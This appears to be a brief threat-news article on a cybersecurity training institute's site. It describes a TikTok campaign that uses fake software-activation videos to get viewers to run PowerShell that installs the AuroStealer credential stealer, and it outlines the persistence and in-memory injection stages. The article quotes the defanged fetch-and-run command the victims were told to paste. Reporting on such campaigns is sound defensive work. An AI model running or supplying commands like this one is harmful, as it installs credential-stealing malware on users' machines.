IGMPI facebook TikTok Malware Campaign Tricks Users with Fake Software Activations
IGMPI Logo
Centre for Sustainable Cybersecurity Technology

(An Autonomous Body Recognized by Ministry of Commerce & Industry, Government of India)

Competency based placement focussed Education I Training I Research I Consultancy

ADMISSIONS NOTICE
18001031071 (Toll Free), +91 11 26512850
Regular | Part-time (Online Live Classes) Modes
TikTok Malware Campaign Tricks Users with Fake Software Activations

TikTok Malware Campaign Tricks Users with Fake Software Activations

Cybercriminals are targeting TikTok users with a malware campaign disguised as free software activation offers. Videos promise access to popular applications like Photoshop, luring viewers into executing malicious PowerShell commands. The attack begins when victims run a command such as `iex (irm slmgr[.]win/photoshop)`, which downloads and runs malicious code from a remote server. The first-stage payload, detected on VirusTotal at a low rate, fetches a secondary executable, `updater.exe`, identified as AuroStealer malware designed to steal credentials and system information. To maintain persistence, the malware sets up scheduled tasks using names that mimic legitimate Windows processes, such as “MicrosoftEdgeUpdateTaskMachineCore.” A third-stage payload, `source.exe`, compiles C# code at runtime and injects shellcode directly into memory using Windows APIs, evading traditional detection methods. Variants of this campaign have been observed targeting users seeking cracked software. Security experts warn against downloading software from untrusted sources and emphasize cautious behavior when following instructions from online videos.

21-10-2025

📰 Recent News